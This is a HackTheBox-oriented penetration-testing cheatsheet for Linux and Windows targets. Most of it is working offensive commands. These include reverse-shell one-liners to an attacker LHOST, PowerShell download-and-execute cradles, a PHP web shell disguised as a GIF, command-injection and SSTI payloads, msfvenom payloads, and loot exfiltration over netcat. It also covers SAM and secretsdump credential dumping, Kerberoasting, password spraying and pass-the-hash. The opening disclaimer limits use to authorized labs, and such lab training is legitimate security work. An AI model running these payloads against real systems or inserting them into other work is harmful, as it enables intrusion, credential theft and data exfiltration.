A practical HackTheBox methodology cheatsheet split by Linux and Windows targets. Use only on HTB, CTF labs, your own machines, or systems where you have explicit authorization.
- Quick Workflow
- Setup
- Reconnaissance
- Linux Targets
- Windows Targets
- Password Cracking
- Port Forwarding and Pivoting
- Useful Wordlists
- References
- Add target to
/etc/hostswhen a hostname is discovered. - Run fast TCP scan, full TCP scan, then targeted UDP when needed.
- Enumerate every open service before exploiting.
- For web services, check technologies, vhosts, directories, parameters, uploads, and source leaks.
- Get a foothold with the lowest-impact working path.
- Stabilize shell and collect local system context.
- Run manual local enumeration before relying on automated scripts.
- Escalate to
root,Administrator,SYSTEM, or domain admin depending on machine goal. - Capture
user.txtandroot.txt/administratorflag. - Write down credentials, paths, ports, and assumptions as you go.
export IP=<TARGET_IP>
export HOST=<TARGET_HOSTNAME>
mkdir -p scans loot exploits wwwsudo sh -c 'echo "<TARGET_IP> <TARGET_HOSTNAME>" >> /etc/hosts'Common local listeners:
nc -lvnp 4444
rlwrap -cAr nc -lvnp 4444
python3 -m http.server 8000
sudo responder -I tun0ping -c 1 $IP
sudo arp-scan -l
fping -a -g 10.10.10.0/24 2>/dev/nullIf ICMP is blocked, rely on port scans.
Fast initial scan:
nmap -p- --min-rate 5000 -oA scans/alltcp $IPTargeted scripts and versions:
ports=$(grep -oP '\d+/open' scans/alltcp.gnmap | cut -d/ -f1 | paste -sd, -)
nmap -sCV -p "$ports" -oA scans/tcpscripts $IPUseful variations:
nmap -sU --top-ports 100 -oA scans/udp-top100 $IP
nmap -A -p "$ports" -oA scans/aggressive $IP
nmap --script vuln -p "$ports" -oA scans/vuln $IPnc -nv $IP <PORT>
curl -i http://$IP/
openssl s_client -connect $IP:443 -servername $HOST
whatweb http://$IP/
searchsploit <service> <version>whatweb http://$HOST/
nikto -host http://$HOST/
feroxbuster -u http://$HOST/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -u http://$HOST/FUZZ
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://$HOST/ -H 'Host: FUZZ.<DOMAIN>' -fs <SIZE>Common checks:
curl -i http://$HOST/robots.txt
curl -i http://$HOST/sitemap.xml
curl -i http://$HOST/.git/HEAD
gobuster dir -u http://$HOST/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,js,bak,zipParameter fuzzing:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u 'http://$HOST/index.php?FUZZ=test' -fs <SIZE>dig @$IP $HOST any
dig axfr @$IP $HOST
dnsrecon -d $HOST -n $IP
dnsenum --dnsserver $IP $HOST- SSH: usernames, keys, weak/default credentials, reused passwords.
- FTP: anonymous login, writable directories, backup files.
- SMB/NFS: readable shares, writable shares, config files, keys.
- Web: LFI/RFI, upload bypass, command injection, SSTI, SQLi, deserialization.
- Databases: default credentials, local-only services exposed through web or pivot.
- Scheduled jobs and writable scripts after foothold.
ssh -o PreferredAuthentications=password <USER>@$IP
ssh -i id_rsa <USER>@$IP
ssh -L 8080:127.0.0.1:80 <USER>@$IPhydra -l <USER> -P /usr/share/wordlists/rockyou.txt ssh://$IPftp anonymous@$IP
nmap --script ftp-anon,ftp-syst,ftp-vsftpd-backdoor -p21 $IP
wget -m ftp://anonymous:anonymous@$IP/smbclient -L //$IP/ -N
smbmap -H $IP
smbmap -H $IP -u <USER> -p <PASS>
smbclient //$IP/<SHARE> -N
nmap --script smb-enum-shares,smb-enum-users -p445 $IPshowmount -e $IP
mkdir -p /tmp/nfs
sudo mount -t nfs $IP:/<EXPORT> /tmp/nfs -o nolock
find /tmp/nfs -lsIf no_root_squash is enabled, root-owned file creation may be useful in CTF labs.
redis-cli -h $IP info
redis-cli -h $IP keys '*'
redis-cli -h $IP get <KEY>mysql -h $IP -u root -p
mysql -h $IP -u <USER> -p<PASS> -e 'show databases;'
nmap --script mysql-info,mysql-users,mysql-databases -p3306 $IPpsql -h $IP -U postgres
psql -h $IP -U <USER> -d <DB>
nmap --script pgsql-brute -p5432 $IP?page=/etc/passwd
?page=../../../../etc/passwd
?page=php://filter/convert.base64-encode/resource=index.php
Files to try:
/etc/passwd
/etc/hosts
/etc/crontab
/proc/self/environ
/proc/self/cmdline
/home/<user>/.ssh/id_rsa
/var/www/html/config.php
;id
&& id
| id
`id`
$(id)
%0Aid
sqlmap -u 'http://$HOST/page.php?id=1' --batch --dbs
sqlmap -u 'http://$HOST/page.php?id=1' -D <DB> --tables --batch
sqlmap -u 'http://$HOST/page.php?id=1' -D <DB> -T <TABLE> --dump --batch{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
shell.php
shell.php5
shell.phtml
shell.php.jpg
shell.phar
Content-Type: image/png
GIF89a;<?php system($_GET['cmd']); ?>
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'nc -e /bin/sh <LHOST> <LPORT>
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/fpython3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<LHOST>",<LPORT>));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'php -r '$s=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:<LPORT>Target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST>:<LPORT>From attacker to target:
python3 -m http.server 8000
wget http://<LHOST>:8000/linpeas.sh -O /tmp/linpeas.sh
curl http://<LHOST>:8000/linpeas.sh -o /tmp/linpeas.shUsing netcat:
# attacker receiver
nc -lvnp 9001 > loot.tar.gz
# target sender
tar czf - /path/to/loot | nc <LHOST> 9001Base64 fallback:
base64 -w0 file.bin
printf '<BASE64>' | base64 -d > file.binpython3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
stty rows 40 cols 120Then press Ctrl+Z locally:
stty raw -echo; fgIdentity and system:
id
whoami
hostname
uname -a
cat /etc/os-release
sudo -lUsers and groups:
cat /etc/passwd
cat /etc/group
lastlog
wNetwork:
ip addr
ip route
ss -tulpn
cat /etc/hostsProcesses and timers:
ps auxww
systemctl list-timers
systemctl list-units --type=service --state=runningFilesystems:
mount
findmnt
lsblk
df -hAutomated helpers:
chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh
chmod +x /tmp/pspy64 && /tmp/pspy64sudo -l
sudo -u <USER> <COMMAND>Check GTFOBins for allowed commands.
find / -perm -4000 -type f -ls 2>/dev/null
find / -perm -2000 -type f -ls 2>/dev/nullgetcap -r / 2>/dev/nullInteresting examples include cap_setuid+ep, cap_dac_read_search+ep, and cap_sys_admin+ep.
find / -writable -type d 2>/dev/null | grep -vE '^/proc|^/sys|^/dev'
find / -writable -type f 2>/dev/null | grep -vE '^/proc|^/sys|^/dev'cat /etc/crontab
ls -la /etc/cron.*
grep -R "" /etc/cron* 2>/dev/nullecho $PATH
strings <SUID_BINARY>If a privileged script or binary calls a relative command from a writable directory, place a controlled executable earlier in PATH.
ls -la /etc/cron* /opt /backup 2>/dev/nullLook for cron scripts using unsafe patterns like tar * in writable directories.
uname -a
searchsploit linux kernel <VERSION>Use kernel exploits as a last resort in HTB after confirming architecture and OS version.
groups
id
ls -la /var/run/docker.sockdocker run -v /:/mnt --rm -it alpine chroot /mnt shcat /etc/exports 2>/dev/null
showmount -e <TARGET>grep -RniE 'pass|password|passwd|pwd|secret|token|key' /var/www /opt /home 2>/dev/null
find /home -name 'id_rsa' -o -name '*.kdbx' -o -name '*.ovpn' 2>/dev/null
find / -name '*.conf' -o -name '*.config' -o -name '.env' 2>/dev/null
cat ~/.bash_history 2>/dev/null
cat ~/.mysql_history 2>/dev/nullInteresting locations:
/var/www/html
/opt
/srv
/home/*
/backups
/etc/passwd
/etc/shadow
/etc/crontab
/etc/systemd/system
/var/log
cat /home/*/user.txt 2>/dev/null
cat /root/root.txt 2>/dev/nullLoot carefully:
hostname; id; ip addr; sudo -l- SMB: anonymous shares, readable backups, writable shares, reused credentials.
- WinRM: valid credentials to shell with Evil-WinRM.
- RDP: valid credentials, password reuse, exposed desktop apps.
- MSSQL: weak credentials,
xp_cmdshell, linked servers. - IIS/web: upload bugs, ASPX shells, config disclosure, SQLi.
- Active Directory: Kerberos, LDAP, SMB, RPC, DNS, certificate services.
smbclient -L //$IP/ -N
smbmap -H $IP
smbmap -H $IP -u <USER> -p <PASS>
crackmapexec smb $IP
crackmapexec smb $IP -u <USER> -p <PASS> --shares
nmap --script smb-enum-shares,smb-enum-users,smb-os-discovery -p445 $IPDownload recursively:
smbclient //$IP/<SHARE> -U '<USER>%<PASS>'
smb: \> recurse on
smb: \> prompt off
smb: \> mget *rpcclient -U '' -N $IP
rpcclient -U '<USER>%<PASS>' $IP
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> queryuser <RID>ldapsearch -x -H ldap://$IP -s base namingcontexts
ldapsearch -x -H ldap://$IP -D '<DOMAIN>\<USER>' -w '<PASS>' -b 'DC=example,DC=local'kerbrute userenum -d <DOMAIN> --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
GetNPUsers.py <DOMAIN>/ -usersfile users.txt -dc-ip $IP -no-pass
GetUserSPNs.py <DOMAIN>/<USER>:<PASS> -dc-ip $IP -requestcrackmapexec winrm $IP -u <USER> -p <PASS>
evil-winrm -i $IP -u <USER> -p <PASS>
evil-winrm -i $IP -u <USER> -H <NTLM_HASH>nmap --script rdp-enum-encryption -p3389 $IP
xfreerdp /v:$IP /u:<USER> /p:<PASS> /cert:ignorenmap --script ms-sql-info,ms-sql-empty-password,ms-sql-config -p1433 $IP
crackmapexec mssql $IP -u <USER> -p <PASS>
impacket-mssqlclient <DOMAIN>/<USER>:<PASS>@$IP -windows-authInside MSSQL:
select @@version;
select name from master..sysdatabases;
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';Common IIS extensions:
.aspx
.asp
.config
.txt
.zip
.bak
.old
IIS/web.config disclosure paths:
/web.config
/backup.zip
/site.zip
/app_offline.htm
ASPX test shell pattern:
<%@ Page Language="C#" %><% Response.Write(System.Security.Principal.WindowsIdentity.GetCurrent().Name); %>Upload and execution checks:
curl -i -F 'file=@shell.aspx' http://$HOST/upload
curl -i http://$HOST/uploads/shell.aspxGenerate with revshells or Nishang when allowed in the lab, then host locally:
python3 -m http.server 8000On target:
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<LHOST>:8000/shell.ps1')"nc.exe -e cmd.exe <LHOST> <LPORT>Import-Module .\Invoke-PowerShellTcp.ps1
Invoke-PowerShellTcp -Reverse -IPAddress <LHOST> -Port <LPORT>msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell-x64.exe
msfvenom -p windows/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter-x86.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter-x64.exeiwr -uri http://<LHOST>:8000/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe
(New-Object Net.WebClient).DownloadFile('http://<LHOST>:8000/nc.exe','C:\Windows\Temp\nc.exe')certutil -urlcache -f http://<LHOST>:8000/file.exe C:\Windows\Temp\file.exeimpacket-smbserver share . -smb2supportOn target:
copy \\<LHOST>\share\winpeas.exe C:\Windows\Temp\winpeas.exeWith credentials:
impacket-smbserver share . -smb2support -username user -password passnet use \\<LHOST>\share /user:user pass
copy \\<LHOST>\share\file.exe .[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\path\file.exe'))
[IO.File]::WriteAllBytes('C:\path\file.exe',[Convert]::FromBase64String('<BASE64>'))Identity and system:
whoami
whoami /priv
whoami /groups
hostname
systeminfo
ipconfig /all
route print
netstat -anoUsers and groups:
net user
net localgroup
net localgroup administrators
net user <USER>PowerShell equivalents:
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember Administrators
Get-ComputerInfo
Get-NetTCPConnectionServices and processes:
tasklist /svc
sc query
wmic service get name,displayname,pathname,startmodeAutomated helpers:
C:\Windows\Temp\winpeas.exe. .\PowerUp.ps1
Invoke-AllChecks
. .\Seatbelt.exe allwhoami /privInteresting privileges:
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeTakeOwnershipPrivilege
Common CTF tools for impersonation paths include JuicyPotato, RoguePotato, PrintSpoofer, and GodPotato. Match the tool to OS version and available privileges.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v '"'sc qc <SERVICE>
sc sdshow <SERVICE>
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv <USER> *Replace binary path:
sc config <SERVICE> binPath= "C:\Windows\Temp\shell.exe"
sc stop <SERVICE>
sc start <SERVICE>reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedmsfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o shell.msimsiexec /quiet /qn /i C:\Windows\Temp\shell.msischtasks /query /fo LIST /v
icacls C:\path\to\task\binary.exeicacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
icacls "C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Look for writable application directories and missing DLL loads with ProcMon when GUI access is available. In HTB, service binaries in writable directories are common clues.
Files:
dir /s /b *pass* *cred* *config* *.kdbx *.txt *.ini 2>nul
dir /s /b C:\Users\*.txt C:\Users\*.kdbx C:\Users\*.config 2>nulRegistry:
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"PowerShell history:
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtCommon locations:
C:\Users\<USER>\Desktop
C:\Users\<USER>\Documents
C:\Users\<USER>\Downloads
C:\inetpub\wwwroot
C:\Program Files
C:\Program Files (x86)
C:\ProgramData
C:\Windows\Temp
Stored credentials:
cmdkey /list
runas /savecred /user:<USER> cmd.exeSAM and SYSTEM if readable:
reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEMsecretsdump.py -sam SAM -system SYSTEM LOCALwhoami /fqdn
whoami /user
net config workstation
nltest /dsgetdc:<DOMAIN>
echo %USERDNSDOMAIN%
echo %LOGONSERVER%Get-ADDomain
Get-ADUser -Filter *
Get-ADGroup -Filter *If RSAT is unavailable, use PowerView.
bloodhound-python -d <DOMAIN> -u <USER> -p <PASS> -ns $IP -c allOn Windows:
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain <DOMAIN> -ZipFileName loot.zipGetNPUsers.py <DOMAIN>/ -dc-ip $IP -usersfile users.txt -no-pass
GetNPUsers.py <DOMAIN>/<USER>:<PASS> -dc-ip $IP -requestCrack:
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt asrep.hashesGetUserSPNs.py <DOMAIN>/<USER>:<PASS> -dc-ip $IP -request -outputfile kerberoast.hashes
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txtcrackmapexec smb $IP -u users.txt -p '<PASSWORD>' --continue-on-success
kerbrute passwordspray -d <DOMAIN> --dc $IP users.txt '<PASSWORD>'Avoid spraying real environments without explicit permission and lockout awareness. In HTB labs, still keep attempts controlled.
crackmapexec smb $IP -u <USER> -H <NTLM_HASH>
evil-winrm -i $IP -u <USER> -H <NTLM_HASH>
psexec.py <DOMAIN>/<USER>@$IP -hashes :<NTLM_HASH>
wmiexec.py <DOMAIN>/<USER>@$IP -hashes :<NTLM_HASH>secretsdump.py <DOMAIN>/<USER>:<PASS>@$IP
secretsdump.py <DOMAIN>/<USER>@$IP -hashes :<NTLM_HASH>certipy find -u <USER>@<DOMAIN> -p '<PASS>' -dc-ip $IP -vulnerable -stdout
certipy find -u <USER>@<DOMAIN> -p '<PASS>' -dc-ip $IP -vulnerable -textGroups.xml
Services.xml
ScheduledTasks.xml
Printers.xml
Registry.xml
SYSVOL scripts
*.kdbx
*.ps1
*.bat
*.config
smbclient //$IP/SYSVOL -U '<DOMAIN>/<USER>%<PASS>'type C:\Users\*\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txtGet-ChildItem C:\Users -Recurse -Filter user.txt -ErrorAction SilentlyContinue
Get-ChildItem C:\Users -Recurse -Filter root.txt -ErrorAction SilentlyContinuejohn --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --format=<FORMAT> --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txthashcat -m <MODE> hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m <MODE> hash.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
hashcat --show -m <MODE> hash.txtCommon modes:
0 MD5
100 SHA1
1400 SHA2-256
1700 SHA2-512
3200 bcrypt
1000 NTLM
5600 NetNTLMv2
13100 Kerberos 5 TGS-REP
18200 Kerberos 5 AS-REP
22000 WPA/WPA2
hashid hash.txt
haiti '<HASH>'
name-that-hash -t '<HASH>'ssh2john id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hashkeepass2john database.kdbx > keepass.hash
john --wordlist=/usr/share/wordlists/rockyou.txt keepass.hashzip2john file.zip > zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
7z2john file.7z > 7z.hash
john --wordlist=/usr/share/wordlists/rockyou.txt 7z.hashssh -L <LOCAL_PORT>:127.0.0.1:<REMOTE_PORT> <USER>@$IPssh -D 1080 <USER>@$IP
proxychains nmap -sT -Pn -p <PORT> <INTERNAL_IP>Attacker:
./chisel server -p 4444 --reverseTarget:
./chisel client <LHOST>:4444 R:socks
./chisel client <LHOST>:4444 R:<LPORT>:<RHOST>:<RPORT>Attacker:
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcertTarget:
./agent -connect <LHOST>:11601 -ignore-certProxy console:
session
ifconfig
start
Add route locally:
sudo ip route add <INTERNAL_CIDR> dev ligolosocat TCP-LISTEN:<LPORT>,fork,reuseaddr TCP:<RHOST>:<RPORT>/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
- Hack The Box Cheat Sheets: https://www.hackthebox.com/resources/cheat-sheets
- HackTricks: https://book.hacktricks.xyz/
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
- GTFOBins: https://gtfobins.github.io/
- LOLBAS: https://lolbas-project.github.io/
- PEASS-ng: https://github.com/peass-ng/PEASS-ng
- InternalAllTheThings: https://github.com/swisskyrepo/InternalAllTheThings
- Active Directory Exploitation Cheat Sheet: https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
- Impacket: https://github.com/fortra/impacket
- CrackMapExec / NetExec-style workflows: https://www.netexec.wiki/
